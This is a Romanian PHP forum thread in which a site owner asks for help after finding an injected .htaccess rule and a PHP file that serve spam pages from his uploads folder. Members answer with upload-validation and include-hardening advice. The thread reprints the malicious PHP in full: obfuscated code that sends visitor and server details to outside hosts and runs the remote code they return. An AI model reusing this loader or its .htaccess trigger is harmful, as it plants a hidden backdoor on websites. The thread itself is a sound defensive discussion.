Forum PHP Romania - Discutii despre PHP, MySQL, Javascript, AJAX, etc

soryn4u · Data înscrierii: 12/Feb/2007 Mesaje: 154

am dat din gresealaa pe google niste serch-uri

si am obs ceva care ma surprins

http://forums.mozolici.com/uploads/profile/I-feel-you-Schiller-Mp3-download.html

aceasta pagina a fost uploadata se pare de cineva care se pricepe
ea nu merge daca e accesata direct.. dupa cum vedeti

insa surpriza....

pagina merge daca e accesata prin google

ceeea ce puteti incerca aici

http://www.google.com/search?hl=en&q=forums.mozolici.com+hell

(o alta intrebare care mi-o pun este
cum naiba google a reusit sa indexeze aceasta pagina)

m-am uitat in ftp... in fisieru uploads si surpriza...
------
cele 2 html-uri de exemplu------
I-feel-you-Schiller-Mp3-download.html
msn-sniffer-2.5-with-crack.html
-----
-----
nu exista

am dat un view source la un html sa vad si eu ce-i pe acolo

si am vazut ceva de genu
Cod: <A HREF="http://209.62.32.80/klik.php?data=GpoxsqfDW54or3JwaU2yZWbGh4cbVHW0701YX8i1f1aP9vtcle1F%2BFVhbQ72%2B61nLg2ekC5qyxxplw%2FJExItMsQhEUYmm2JrmdSPIEJv6x1myRkcaul4GV6T4mszxUJd9%2BxD8VxcEibKUazIgww7QaUaETrJBezkEu1KvcsWzX4yqsfETYYc6feMmWW6McY0kXjeXCn7YIGKqu9%2Frhm%

acel ip 209.62.32.80
se pare ca face parte dintro clasa de ip-uri considerate periculoase

lista o gasiti aici

www.malwaredomainlist.com/mdl.php

----
intrebare
---------------
--------------
---------------

cum e posibil ca cineva sa bage pagini si sa le ruleze pe serverul meu

si cum pot scapa de asa ceva pe viitor !!!

ceva protectie ma intereseaza!!!

Pirahna · Trimis: Dum Oct 14, 2007 10:30 pm Titlul subiectului:

e vina ta.
ia uita-te in baza de date.

soryn4u · Data înscrierii: 12/Feb/2007 Mesaje: 154

m-am uitat .. in baza de date nu e nici un msn-sniffer sau nici un schiller

soryn4u · Data înscrierii: 12/Feb/2007 Mesaje: 154

am gasit insa in folderul uploads 2 frisiere

httacces
--------------
Options -MultiViews
ErrorDocument 404 //uploads/profile/144251.php

si
144251.php
-----------------
Cod: <? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str);} ?>

sa fie oare acest php care face html-uri automat ?

Pirahna · Trimis: Dum Oct 14, 2007 10:59 pm Titlul subiectului:

pai nu-l vezi ? ala e.

soryn4u · Data înscrierii: 12/Feb/2007 Mesaje: 154

si dak le sterg

crezi ca m-am rezolvat? :)))

---------
------
bine ms
omu intra saptamana viitoare si mi le baga din nou :>
---------
------------
cum fac sa nul mai las sa le bage:>

si nu ma refer numa la acest director...

sa zicem alt director din site ...eu cum as putea sti ca cineva
sa zicem se plictiseste ("si se joacaa" incarcand sa imi incarce alte minunatii)
------
un sistem de alarma nu gasesc?:> (o mitraliera ceva)

soryn4u · Data înscrierii: 12/Feb/2007 Mesaje: 154

haide ma... curaj.. nimeni nu-mi poate spune cum pot scapa de-un hacker ca cel de sus?

---------------
(nu vreau sa imi incarce si altii fisiere pe site)

----------------

kleampa · Trimis: Mar Oct 16, 2007 7:21 pm Titlul subiectului:

inseamna ca a uploadat un fisier .php prin intermediul unui formular de prin site
fa verificari de extensie inainte de upload

Birkoff · Trimis: Mie Oct 17, 2007 10:38 am Titlul subiectului:

1. daca ai un formular de upload verifica ce tip de fisier este uploadat (nu permite decat strictul necesar de genul jpg, gif etc)
2. daca incarci paginile prin variabile get nu permite rularea scripturilor externe
3. citeste articolele de aici http://phpsec.org/projects/guide/ro/index.html

soryn4u · Data înscrierii: 12/Feb/2007 Mesaje: 154

super :>
am acuma destula documentatie
incat sa ma securizez tot anu :>

alopia · Data înscrierii: 02/Sep/2007 Mesaje: 35

Numa sa te rogi ca administratorii serverului de la hostnine.com unde gazduiesti tu sa-si faca si ei bine meseria.
Dar pe shared hosting-urile astea setarile sunt din start prea relaxate ca cineva
sa nu gaseasca o metoda sa ti-o faca :lol:

Eu am avut un site spart, care dupa multe sapaturi cu ajutorul
administratorului serverului am descoperit ca era atacat regulat de un alt user
de pe server. A carui date personale s-a dovedit ca erau falsificate iar ordinul
de plata trimis prin mail ca sa-i activeze acontul un fals ordinar. Nici pina azi nu
stiu cine a fost.

Scriptul meu PHP saracul era facut cit se poate de paranoic. Degeaba. :twisted:

Din pacate in ecuatia asta a securitatii, programatorul PHP nu e intotdeauna
responsabil de tot ce se intimpla asa cum dragi nostri hosteri incearca sa
ne faca intotdeauna sa credem. :cry:

alexandru_24 · Data înscrierii: 11/Iul/2006 Mesaje: 95

are dreptate alopia.

PHPRomania Bot · Mie Dec 26, 2007 7:01 pm